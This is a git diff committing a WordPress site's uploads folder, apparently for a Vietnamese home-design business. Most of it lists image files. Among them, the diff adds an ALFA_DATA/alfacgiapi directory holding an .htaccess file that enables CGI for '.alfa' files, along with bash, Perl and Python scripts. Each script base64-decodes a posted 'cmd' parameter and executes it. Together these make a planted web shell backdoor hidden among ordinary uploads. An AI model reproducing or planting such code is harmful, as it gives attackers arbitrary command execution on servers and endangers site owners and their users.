init
BIN
wp-content/uploads/2022/02/1-chi-phi-xay-nha-5-tang-60m2-dep.jpg
Normal file
After Width: | Height: | Size: 99 KiB |
After Width: | Height: | Size: 119 KiB |
After Width: | Height: | Size: 119 KiB |
After Width: | Height: | Size: 278 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 184 KiB |
BIN
wp-content/uploads/2022/02/1-thiet-ke-nha-5-tang-60m2-dep.jpg
Normal file
After Width: | Height: | Size: 99 KiB |
After Width: | Height: | Size: 96 KiB |
After Width: | Height: | Size: 75 KiB |
BIN
wp-content/uploads/2022/02/2703063-128-100x100.png
Normal file
After Width: | Height: | Size: 4.0 KiB |
BIN
wp-content/uploads/2022/02/2703063-128.png
Normal file
After Width: | Height: | Size: 3.2 KiB |
BIN
wp-content/uploads/2022/02/2703076-128-100x100.png
Normal file
After Width: | Height: | Size: 3.5 KiB |
BIN
wp-content/uploads/2022/02/2703076-128.png
Normal file
After Width: | Height: | Size: 2.1 KiB |
BIN
wp-content/uploads/2022/02/2867879-128-100x100.png
Normal file
After Width: | Height: | Size: 3.8 KiB |
BIN
wp-content/uploads/2022/02/2867879-128.png
Normal file
After Width: | Height: | Size: 2.8 KiB |
After Width: | Height: | Size: 126 KiB |
After Width: | Height: | Size: 126 KiB |
@@ -0,0 +1,4 @@
|
||||
#Coded By Sole Sad & Invisible
|
||||
Options FollowSymLinks MultiViews Indexes ExecCGI
|
||||
AddType application/x-httpd-cgi .alfa
|
||||
AddHandler cgi-script .alfa
|
60
wp-content/uploads/2022/02/ALFA_DATA/alfacgiapi/bash.alfa
Normal file
@@ -0,0 +1,60 @@
|
||||
#!/bin/bash
|
||||
echo -e "Content-type: text/html\n\n"
|
||||
function cgi_get_POST_vars(){
|
||||
[ "$REQUEST_METHOD" != "POST" ] && return
|
||||
[ ! -z "$QUERY_STRING_POST" ] && return
|
||||
[ -z "$CONTENT_LENGTH" ] && return
|
||||
read -N $CONTENT_LENGTH QUERY_STRING_POST
|
||||
return
|
||||
}
|
||||
function cgi_decodevar(){
|
||||
[ $# -ne 1 ] && return
|
||||
local v t h
|
||||
t="${1//+/ }%%"
|
||||
while [ ${#t} -gt 0 -a "${t}" != "%" ]; do
|
||||
v="${v}${t%%\%*}"
|
||||
t="${t#*%}"
|
||||
if [ ${#t} -gt 0 -a "${t}" != "%" ]; then
|
||||
h=${t:0:2}
|
||||
t="${t:2}"
|
||||
v="${v}"`echo -e \\\\x${h}`
|
||||
fi
|
||||
done
|
||||
echo "${v}"
|
||||
return
|
||||
}
|
||||
function cgi_getvars(){
|
||||
[ $# -lt 2 ] && return
|
||||
local q p k v s
|
||||
case $1 in
|
||||
GET)
|
||||
[ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
|
||||
;;
|
||||
POST)
|
||||
cgi_get_POST_vars
|
||||
[ ! -z "${QUERY_STRING_POST}" ] && q="${QUERY_STRING_POST}&"
|
||||
;;
|
||||
BOTH)
|
||||
[ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
|
||||
cgi_get_POST_vars
|
||||
[ ! -z "${QUERY_STRING_POST}" ] && q="${q}${QUERY_STRING_POST}&"
|
||||
;;
|
||||
esac
|
||||
shift
|
||||
s=" $* "
|
||||
while [ ! -z "$q" ]; do
|
||||
p="${q%%&*}"
|
||||
k="${p%%=*}"
|
||||
v="${p#*=}"
|
||||
q="${q#$p&*}"
|
||||
[ "$1" = "ALL" -o "${s/ $k /}" != "$s" ] && \
|
||||
export "$k"="`cgi_decodevar \"$v\"`"
|
||||
done
|
||||
return
|
||||
}
|
||||
cgi_getvars POST ALL
|
||||
query=$(echo $cmd | base64 --decode)
|
||||
echo $(echo $check | base64 --decode)
|
||||
echo -e "<pre>\c"
|
||||
eval ${query}
|
||||
echo -e "</pre>\c"
|
@@ -0,0 +1,2 @@
|
||||
#!/usr/bin/perl -I/usr/local/bandmin
|
||||
use MIME::Base64;print "Content-type: text/html\n\n";if($ENV{'REQUEST_METHOD'} eq "POST"){my ($i, $key, $val, $in);read(STDIN, $in, $ENV{'CONTENT_LENGTH'});@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i], 2);$key =~ s/%(..)/pack("c", hex($1))/ge;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} .= "\0" if (defined($in{$key}));$in{$key} .= $val;}if($in{"cmd"}){print decode_base64($in{"check"})."<pre>";system(decode_base64($in{"cmd"}));print "</pre>"}}
|
18
wp-content/uploads/2022/02/ALFA_DATA/alfacgiapi/py.alfa
Normal file
@@ -0,0 +1,18 @@
|
||||
#!/usr/bin/python
|
||||
try:
|
||||
import cgitb; cgitb.enable()
|
||||
except:
|
||||
pass
|
||||
import os,cgi,base64
|
||||
form = cgi.FieldStorage(environ={'REQUEST_METHOD':'POST'})
|
||||
cmd = form.getvalue('cmd')
|
||||
check = form.getvalue('check')
|
||||
print "Content-type:text/html\r\n\r\n"
|
||||
if cmd:
|
||||
print base64.b64decode(check)+"<pre>"
|
||||
child_stdin, child_stdout = os.popen2(base64.b64decode(cmd))
|
||||
child_stdin.close()
|
||||
result = child_stdout.read()
|
||||
child_stdout.close()
|
||||
print result.strip()
|
||||
print "</pre>"
|
BIN
wp-content/uploads/2022/02/AN-LAC-150x150.png
Normal file
After Width: | Height: | Size: 4.7 KiB |
BIN
wp-content/uploads/2022/02/AN-LAC-300x300.png
Normal file
After Width: | Height: | Size: 10 KiB |
BIN
wp-content/uploads/2022/02/AN-LAC.png
Normal file
After Width: | Height: | Size: 14 KiB |
BIN
wp-content/uploads/2022/02/Frame-100x100.png
Normal file
After Width: | Height: | Size: 8.2 KiB |
BIN
wp-content/uploads/2022/02/Frame-150x150.png
Normal file
After Width: | Height: | Size: 16 KiB |
BIN
wp-content/uploads/2022/02/Frame.png
Normal file
After Width: | Height: | Size: 3.5 KiB |
BIN
wp-content/uploads/2022/02/Mau-thiet-ke-noi-that-cho-nha-ong.jpg
Normal file
After Width: | Height: | Size: 360 KiB |
BIN
wp-content/uploads/2022/02/alex-KEEpi-SOM_s-unsplash-150x150.jpg
Normal file
After Width: | Height: | Size: 2.3 KiB |
BIN
wp-content/uploads/2022/02/alex-KEEpi-SOM_s-unsplash-240x300.jpg
Normal file
After Width: | Height: | Size: 4.8 KiB |
BIN
wp-content/uploads/2022/02/alex-KEEpi-SOM_s-unsplash-768x960.jpg
Normal file
After Width: | Height: | Size: 27 KiB |
After Width: | Height: | Size: 30 KiB |
BIN
wp-content/uploads/2022/02/alex-KEEpi-SOM_s-unsplash.jpg
Normal file
After Width: | Height: | Size: 46 KiB |
After Width: | Height: | Size: 136 KiB |
After Width: | Height: | Size: 7.4 KiB |
After Width: | Height: | Size: 18 KiB |
After Width: | Height: | Size: 86 KiB |
BIN
wp-content/uploads/2022/02/biet-thu-dep-nhat-viet-nam-1-1.jpeg
Normal file
After Width: | Height: | Size: 135 KiB |
After Width: | Height: | Size: 136 KiB |
After Width: | Height: | Size: 7.4 KiB |
After Width: | Height: | Size: 18 KiB |
After Width: | Height: | Size: 86 KiB |
BIN
wp-content/uploads/2022/02/biet-thu-dep-nhat-viet-nam-1.jpeg
Normal file
After Width: | Height: | Size: 135 KiB |
After Width: | Height: | Size: 4.2 KiB |
After Width: | Height: | Size: 91 KiB |
After Width: | Height: | Size: 7.3 KiB |
After Width: | Height: | Size: 15 KiB |
After Width: | Height: | Size: 20 KiB |
After Width: | Height: | Size: 41 KiB |
After Width: | Height: | Size: 59 KiB |
BIN
wp-content/uploads/2022/02/brooke-cagle-uHVRvDr7pg-unsplash.jpg
Normal file
After Width: | Height: | Size: 105 KiB |
BIN
wp-content/uploads/2022/02/cate-1.png
Normal file
After Width: | Height: | Size: 2.3 KiB |
BIN
wp-content/uploads/2022/02/cate-2.png
Normal file
After Width: | Height: | Size: 2.3 KiB |
BIN
wp-content/uploads/2022/02/cate-3.png
Normal file
After Width: | Height: | Size: 2.5 KiB |
BIN
wp-content/uploads/2022/02/cate-4.png
Normal file
After Width: | Height: | Size: 2.2 KiB |
After Width: | Height: | Size: 61 KiB |
After Width: | Height: | Size: 4.6 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 40 KiB |
BIN
wp-content/uploads/2022/02/cole-keister-8V1gfeaPP1Y-unsplash.jpg
Normal file
After Width: | Height: | Size: 70 KiB |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC-150x150.png
Normal file
After Width: | Height: | Size: 4.8 KiB |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC-180x180.png
Normal file
After Width: | Height: | Size: 6.2 KiB |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC-192x192.png
Normal file
After Width: | Height: | Size: 6.7 KiB |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC-270x270.png
Normal file
After Width: | Height: | Size: 10 KiB |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC-300x300.png
Normal file
After Width: | Height: | Size: 12 KiB |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC-32x32.png
Normal file
After Width: | Height: | Size: 563 B |
BIN
wp-content/uploads/2022/02/cropped-AN-LAC.png
Normal file
After Width: | Height: | Size: 20 KiB |
BIN
wp-content/uploads/2022/02/dane-deaner-_-KLkj7on_c-unsplash.jpg
Normal file
After Width: | Height: | Size: 171 KiB |
After Width: | Height: | Size: 3.2 KiB |
After Width: | Height: | Size: 73 KiB |
After Width: | Height: | Size: 5.7 KiB |
After Width: | Height: | Size: 144 KiB |
After Width: | Height: | Size: 11 KiB |
After Width: | Height: | Size: 16 KiB |
After Width: | Height: | Size: 31 KiB |
After Width: | Height: | Size: 46 KiB |
BIN
wp-content/uploads/2022/02/kari-shea-YCQFgqOzLmU-unsplash.jpg
Normal file
After Width: | Height: | Size: 178 KiB |
After Width: | Height: | Size: 68 KiB |
After Width: | Height: | Size: 4.0 KiB |
After Width: | Height: | Size: 8.8 KiB |
After Width: | Height: | Size: 42 KiB |
After Width: | Height: | Size: 84 KiB |
After Width: | Height: | Size: 4.1 KiB |
After Width: | Height: | Size: 103 KiB |
After Width: | Height: | Size: 7.1 KiB |
After Width: | Height: | Size: 16 KiB |
After Width: | Height: | Size: 20 KiB |
After Width: | Height: | Size: 47 KiB |
After Width: | Height: | Size: 67 KiB |
BIN
wp-content/uploads/2022/02/lara-far-PKTSHQMm-5c-unsplash.jpg
Normal file
After Width: | Height: | Size: 116 KiB |
BIN
wp-content/uploads/2022/02/logo-1-150x150.png
Normal file
After Width: | Height: | Size: 25 KiB |
BIN
wp-content/uploads/2022/02/logo-1-300x275.png
Normal file
After Width: | Height: | Size: 73 KiB |
BIN
wp-content/uploads/2022/02/logo-1.png
Normal file
After Width: | Height: | Size: 20 KiB |
BIN
wp-content/uploads/2022/02/logo-150x150.jpg
Normal file
After Width: | Height: | Size: 3.1 KiB |
BIN
wp-content/uploads/2022/02/logo-150x150.png
Normal file
After Width: | Height: | Size: 8.3 KiB |
BIN
wp-content/uploads/2022/02/logo-300x113.jpg
Normal file
After Width: | Height: | Size: 5.8 KiB |
BIN
wp-content/uploads/2022/02/logo-300x113.png
Normal file
After Width: | Height: | Size: 20 KiB |
BIN
wp-content/uploads/2022/02/logo-768x289.jpg
Normal file
After Width: | Height: | Size: 18 KiB |
BIN
wp-content/uploads/2022/02/logo-768x289.png
Normal file
After Width: | Height: | Size: 95 KiB |
BIN
wp-content/uploads/2022/02/logo-light-100x84.png
Normal file
After Width: | Height: | Size: 1.4 KiB |